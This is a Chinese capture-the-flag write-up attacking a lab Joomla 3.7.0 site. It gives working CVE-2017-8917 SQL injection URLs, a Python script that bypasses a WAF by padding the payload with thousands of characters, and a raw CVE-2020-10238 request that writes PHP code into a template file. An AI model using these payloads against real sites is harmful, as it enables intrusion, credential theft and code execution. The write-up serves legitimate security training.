掌控安全-封神台-擂台赛-B组复现
做了好几天A组,太顶了,全是0day,不知道远程环境的问题还是什么,跟着复现一直打不下来,就先肝了B组,A组有时间再搞了
信息收集
http://awd19-b22.aqlab.cn/language/en-GB/en-GB.xml
信息泄露 Joomla v3.7.0
搜到CVE-2017-8917,Joomla v3.7.0 SQL注入漏洞,直接拿POC打了
但是发现有waf,经过尝试后发现,函数加反引号可以绕过过滤
再扫一扫,看能不能找到后台
访问/admincp,进入后台登陆页面
sql注入
爆user:
http://awd19-b22.aqlab.cn/?option=com_fields&view=fields&layout=modal&list[fullordering]=`updatexml`(0x23,concat(1,user()),1)
爆库名:
http://awd19-b22.aqlab.cn/?option=com_fields&view=fields&layout=modal&list[fullordering]=`updatexml`(0x23,concat(1,database()),1) joomla
爆表名
发现失败,测试发现过滤了select from 组合
常见的绕过方法都试了一下,不行。只能尝试耗尽资源了
编写exp
import requests
url = 'http://awd19-b22.aqlab.cn/'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
}
for i in range(2500,9999):
payload1 = '`updatexml`(0x23,concat'
payload2 = "/*"+"ABC"*i+"*/(1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)"
payload = payload1 + payload2
data = {
"option":"com_fields",
"view":"fields",
"layout":"modal",
"list[fullordering]":payload
}
print(i)
re = requests.post(url,headers=headers,data=data).text
print(data)
print(re)
if "url" not in re:
print(payload)
print(re)
大概要七八千个字符的样子吧
跑表名:
找到像有flag的表
跑列名:
id和passwd
select id from #__user_flag
select passwd from #__user_flag
利用账号密码成功登陆后台
访问根目录
在内容管理|多媒体文件管理|默认设置中可以更改默认上传路径,想改格式但是权限不够
但是没关系,再返回多媒体文件管理处,此时可查看的文件目录已经变成根目录,发现flag
越权
寻找Joomla漏洞,发现CVE-2020-10238
想尝试直接用poc打,试了一下普通管理员用户,失败
思路:(借用零组文库中的)
- 首先超级管理员跟管理员的后台界面是不同的
- 将恶意代码添加到index.php里面
- 使用管理员账户修改index.php,通过超级管理员进行index.php的文件编辑来获取到返回请求。
POST /administrator/index.php?option=com_templates&view=template&id=506&file=L2Vycm9yLnBocA HTTP/1.1
Host: awd19-b22.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Origin: http://awd19-b22.aqlab.cn
Connection: close
Referer: http://awd19-b22.aqlab.cn/administrator/index.php?option=com_templates
Cookie: 130278f82abbc8f1ceb3ac4309021b2b=slam3h7l6okovrs20tvp1fesq0; security_background_key=9b7cb5d77dcd0fd33bcc81776e969fbc; 690431198df27d8fa794457ed53cca89=bffrsha2dq6ueau37ssp0pf176
Upgrade-Insecure-Requests: 1
jform%5Bsource%5D=<?php phpinfo() ?>&task=template.save&7f2ce2c7034f63a9d01ad505d26d83ee=1&jform%5Bextension_id%5D=506&jform%5Bfilename%5D=%2Ferror.php
提交如上数据包,访问/templates/protostar/error.php
phpinfo成功执行
由于有waf,就不写shell了,直接ls爆路径,爆出flag即可